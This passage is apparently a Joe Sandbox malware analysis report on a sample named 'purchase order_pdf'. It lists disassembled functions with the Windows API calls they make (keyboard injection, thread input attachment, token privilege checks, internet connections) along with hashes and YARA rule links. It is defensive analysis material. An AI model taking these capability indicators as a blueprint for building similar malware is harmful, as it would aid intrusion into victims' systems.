Instruction Fuzzy Hash: A2317EB460421CFFEB209B78CC89FBD37A5FB09324F648516FB51D62A1DE30A9409B52

Function 008FADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 008FAE1A
GetWindowRect.USER32(?,?), ref: 008FAE90
PtInRect.USER32(?,?,008FC304), ref: 008FAEA0
MessageBeep.USER32(00000000), ref: 008FAF11

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 5e251c6d37261d8f3ab478ca2b25bac091d55300ea886499863e420bd3614973
Instruction ID: e46341988fa3070d9052021abbfbd6a0f17447fa96649c263c0e013d7d236c67
Opcode Fuzzy Hash: 5e251c6d37261d8f3ab478ca2b25bac091d55300ea886499863e420bd3614973
Instruction Fuzzy Hash: 31418DB460411DEFCB19CF68C884A797BF5FF48360F1481A9E618CB251D730A842DF62

Function 008D0FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008D1037
SetKeyboardState.USER32(00000080,?,00000001), ref: 008D1053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008D10B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008D110B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 26a0519f6a99c9d945a71483ed4d3e6db4f3b50734c6cb1a14e8f4432b48b511
Instruction ID: a293f29deef0943b5f4f4cbd0426158139372eef4c8d7af928f0ea78226e3397
Opcode Fuzzy Hash: 26a0519f6a99c9d945a71483ed4d3e6db4f3b50734c6cb1a14e8f4432b48b511
Instruction Fuzzy Hash: 3D310770A40A88BAEF30AA658C0DBB9BBA9FF44310F04431BE580D23D1C6744DC19755

Function 008D1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 008D1176
SetKeyboardState.USER32(00000080,?,00008000), ref: 008D1192
PostMessageW.USER32(00000000,00000101,00000000), ref: 008D11F1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 008D1243

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e234d2a3563f81c0954df582a413f80945d93d806930f60c3637fbf1e655677a
Instruction ID: 1aa6b28af2d555a2c3658c6bf62e51c599cfa4222c6b72918a58c7f913f7f488
Opcode Fuzzy Hash: e234d2a3563f81c0954df582a413f80945d93d806930f60c3637fbf1e655677a
Instruction Fuzzy Hash: 1D310530A4061CBAEF20CA69880DBFABBAAFF49310F04531BE690D23D1C73589959755

Function 008A6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008A644B
__isleadbyte_l.LIBCMT ref: 008A6479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008A64A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008A64DD

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9b82823455bc25a41518b5628ff43fc0f226d3281ee2b8d4d72d720fd896c67c
Instruction ID: 6501411a81253c274cfe6885bae3e0e4dcc5109401fcd391cfb298fb107524cb
Opcode Fuzzy Hash: 9b82823455bc25a41518b5628ff43fc0f226d3281ee2b8d4d72d720fd896c67c
Instruction Fuzzy Hash: 5D31AF3160224AAFEB228F65C845BAA7BA5FF4A310F194029E854C7595F731D8A0DB94

Function 008F5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 008F5189

Part of subcall function 008D387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008D3897
Part of subcall function 008D387D: GetCurrentThreadId.KERNEL32 ref: 008D389E
Part of subcall function 008D387D: AttachThreadInput.USER32(00000000,?,008D52A7), ref: 008D38A5

GetCaretPos.USER32(?), ref: 008F519A
ClientToScreen.USER32(00000000,?), ref: 008F51D5
GetForegroundWindow.USER32 ref: 008F51DB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a8e8682417b2ea03c8b920ef40fa9a82e47401c3821b9fdff0bbd80df83c6aeb
Instruction ID: 05fec0dd8caddfe97da943407328645db7e4776cb7b1663331a16949e7fb036c
Opcode Fuzzy Hash: a8e8682417b2ea03c8b920ef40fa9a82e47401c3821b9fdff0bbd80df83c6aeb
Instruction Fuzzy Hash: CF311A71900118ABDB00EFB9C885DEFB7F9FF98300F10806AE555E7251EA759E45CBA1

Function 008FC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

GetCursorPos.USER32(?), ref: 008FC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008ABBFB,?,?,?,?,?), ref: 008FC7D7
GetCursorPos.USER32(?), ref: 008FC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008ABBFB,?,?,?), ref: 008FC85E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 10ba9c08cafd56f951ffb48c9e4f27b1f0d3c6eeb8bace8f7abef3621a34d399
Instruction ID: 6866f06643307fd86adf05b1be7a5d172387745f0db4d624fe66ed8630f8f4a9
Opcode Fuzzy Hash: 10ba9c08cafd56f951ffb48c9e4f27b1f0d3c6eeb8bace8f7abef3621a34d399
Instruction Fuzzy Hash: 39315C3561001CAFCB15CF68C898EBA7BA6FB49350F044169FA05CB261C7329A60DFA0

Function 008C8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008C8669
Part of subcall function 008C8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008C8673
Part of subcall function 008C8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008C8682
Part of subcall function 008C8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008C8689
Part of subcall function 008C8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008C869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008C8BEB
_memcmp.LIBCMT ref: 008C8C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 008C8C44
HeapFree.KERNEL32(00000000), ref: 008C8C4B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: cc62dbd8a935f306eea7cb7d798930fec85a556808d2f473ecc6a939c9efe432
Instruction ID: a974ead1da0c1c7b2f73d77c1ea6806befd225b8ec1281be3103885ccdf5a8a0
Opcode Fuzzy Hash: cc62dbd8a935f306eea7cb7d798930fec85a556808d2f473ecc6a939c9efe432
Instruction Fuzzy Hash: 28218972E81208EBCB00DFA4C948FEEB7B8FF40351F044059E554E7241DB30AA06DB60

Function 00890BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00890BF2

Part of subcall function 00875B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008D7B20,?,?,00000000), ref: 00875B8C
Part of subcall function 00875B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008D7B20,?,?,00000000,?,?), ref: 00875BB0

_fprintf.LIBCMT ref: 00890C29
OutputDebugStringW.KERNEL32(?), ref: 008C6331

Part of subcall function 00894CDA: _flsall.LIBCMT ref: 00894CF3

__setmode.LIBCMT ref: 00890C5E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: aeeaacba63323af522503c5bfde26874c0bcc0fd9d8bdcc938b7735cc3d0b1dd
Instruction ID: 27631deb4cf7ba531f2a07bb11fc13241ed473b54cb9d35d6539d69db95fc0bc
Opcode Fuzzy Hash: aeeaacba63323af522503c5bfde26874c0bcc0fd9d8bdcc938b7735cc3d0b1dd
Instruction Fuzzy Hash: 10110531A04208BEDF0473B89C42DBE7B69FF45320F18411AF208D7292DE619D529796

Function 008E1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008E1A97

Part of subcall function 008E1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008E1B40
Part of subcall function 008E1B21: InternetCloseHandle.WININET(00000000), ref: 008E1BDD

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 1b415cf6addaec4b3bd300d80e297dbda759073191368632f1b6151d2fd59f8d
Instruction ID: 2e585d557b1357e0d52cf0baabb5c0adbbd1c99a4c997d037d37622328d51cc7
Opcode Fuzzy Hash: 1b415cf6addaec4b3bd300d80e297dbda759073191368632f1b6151d2fd59f8d
Instruction Fuzzy Hash: 6221A435200685BFDB119F768C05FBAB7ADFF86711F10001AFA11D6651E771E811D790

Function 008CE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008CF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008CE1C4,?,?,?,008CEFB7,00000000,000000EF,00000119,?,?), ref: 008CF5BC
Part of subcall function 008CF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 008CF5E2
Part of subcall function 008CF5AD: lstrcmpiW.KERNEL32(00000000,?,008CE1C4,?,?,?,008CEFB7,00000000,000000EF,00000119,?,?), ref: 008CF613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,008CEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008CE1DD
lstrcpyW.KERNEL32(00000000,?), ref: 008CE203
lstrcmpiW.KERNEL32(00000002,cdecl,?,008CEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008CE237

Strings

cdecl, xrefs: 008CE22E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 9ff5c528780af4a7568b1a3e7e2cb72f37a2c93c7b441059280dff5ec2fc3e78
Instruction ID: 454e0e6d974959ce5daae2897b5d64522852985623b3597477ceccca1628eaa8
Opcode Fuzzy Hash: 9ff5c528780af4a7568b1a3e7e2cb72f37a2c93c7b441059280dff5ec2fc3e78
Instruction Fuzzy Hash: CA119A36200305EBCB25AF68D845F7A77B9FF84350B40802AFA16CB2A0EB71D850D7A1

Function 008A5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008A5351

Part of subcall function 0089594C: __FF_MSGBANNER.LIBCMT ref: 00895963
Part of subcall function 0089594C: __NMSG_WRITE.LIBCMT ref: 0089596A
Part of subcall function 0089594C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00891013,?), ref: 0089598F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 306d44b847b88db9ef4d37e88b0084acfa1e736ffbf324f175fbdfa44de23a53
Instruction ID: 7a18abe309472a0fe69d6520236a57479368ccfddc10124ee23cdbec45b6afdb
Opcode Fuzzy Hash: 306d44b847b88db9ef4d37e88b0084acfa1e736ffbf324f175fbdfa44de23a53
Instruction Fuzzy Hash: C7110132404A16EEEF313F78AC0162A3798FF533A4F18042AFA04DA791DEB18980C791

Function 00874531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00874560

Part of subcall function 0087410D: _memset.LIBCMT ref: 0087418D
Part of subcall function 0087410D: _wcscpy.LIBCMT ref: 008741E1
Part of subcall function 0087410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008741F1

KillTimer.USER32(?,00000001,?,?), ref: 008745B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008745C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008AD6CE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: f819c55ef8546d1cd873e757df6500bf97ff6275bbcea126d933a7da99ecd1ef
Instruction ID: 6184508a8117391b5437de70893f3ee40e70ad0381329e52186a422f2454a861
Opcode Fuzzy Hash: f819c55ef8546d1cd873e757df6500bf97ff6275bbcea126d933a7da99ecd1ef
Instruction Fuzzy Hash: 3121C870508784AFEB329B249C45BE7BBECFF11308F04409DE69ED6545C7745A84DB91

Function 008E667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00875B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008D7B20,?,?,00000000), ref: 00875B8C
Part of subcall function 00875B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008D7B20,?,?,00000000,?,?), ref: 00875BB0

gethostbyname.WSOCK32(?,?,?), ref: 008E66AC
WSAGetLastError.WSOCK32(00000000), ref: 008E66B7
_memmove.LIBCMT ref: 008E66E4
inet_ntoa.WSOCK32(?), ref: 008E66EF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: fa8bc956af40c4f19a4e57ad1815fe436d8559424211c5c9998fe7f4f7921387
Instruction ID: e92be6302faa1ad0bd4ce909b3bc36f9be6c900bf0df1b4baee0c9e1db4a70cc
Opcode Fuzzy Hash: fa8bc956af40c4f19a4e57ad1815fe436d8559424211c5c9998fe7f4f7921387
Instruction Fuzzy Hash: 19114F35510509ABCB00EBA8DD86DAEB7B8FF55350B148065F606E7262DB70DE14CB52

Function 008C9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 008C9043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008C9055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008C906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 008C9086

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 83984f8998160c50a9a53c57c87868fadefdd6131a640a0ec6fd281ef700e953
Instruction ID: 760a0fb388391bd19314a97a96c238750dd5b432d6de9f3ca4b2411cc275a7a9
Opcode Fuzzy Hash: 83984f8998160c50a9a53c57c87868fadefdd6131a640a0ec6fd281ef700e953
Instruction Fuzzy Hash: 33114C79900218FFDB10DFA5C884FADBBB4FB48310F204095EA04B7250D671AE10DB94

Function 00871290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

DefDlgProcW.USER32(?,00000020,?), ref: 008712D8
GetClientRect.USER32(?,?), ref: 008AB84B
GetCursorPos.USER32(?), ref: 008AB855
ScreenToClient.USER32(?,?), ref: 008AB860

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 452f95ac8354f61828c461aca2ea275bce96a51c950239410522c006c8702273
Instruction ID: e6026b4600bd70cebda9d205a3885c3e30537714bf7fde3f24aeec35c1fb990d
Opcode Fuzzy Hash: 452f95ac8354f61828c461aca2ea275bce96a51c950239410522c006c8702273
Instruction Fuzzy Hash: 0F111635910119AFCF10EFA8D889DBE77B8FB09300F108456EA55E7652C730AA51CBA6

Function 008D1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008D01FD,?,008D1250,?,00008000), ref: 008D166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,008D01FD,?,008D1250,?,00008000), ref: 008D1694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008D01FD,?,008D1250,?,00008000), ref: 008D169E
Sleep.KERNEL32(?,?,?,?,?,?,?,008D01FD,?,008D1250,?,00008000), ref: 008D16D1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: aa191e64d3b1c50ca640d389688847dc7b54844d0cd00a5d87f686e4f1c97161
Instruction ID: bbd50133a1fcd181cb1a3881010944ff73165b02951f785de09edc20f33f6e2e
Opcode Fuzzy Hash: aa191e64d3b1c50ca640d389688847dc7b54844d0cd00a5d87f686e4f1c97161
Instruction Fuzzy Hash: 6F112A31C0451DEBCF009FA5E948AFEBB78FF19751F054156EA41F6240CB3095A0CB96

Function 008A7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 008A722B

Part of subcall function 008A7912: __fltout2.LIBCMT ref: 008A793B

__cftog_l.LIBCMT ref: 008A7251
__cftoe_l.LIBCMT ref: 008A7283

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

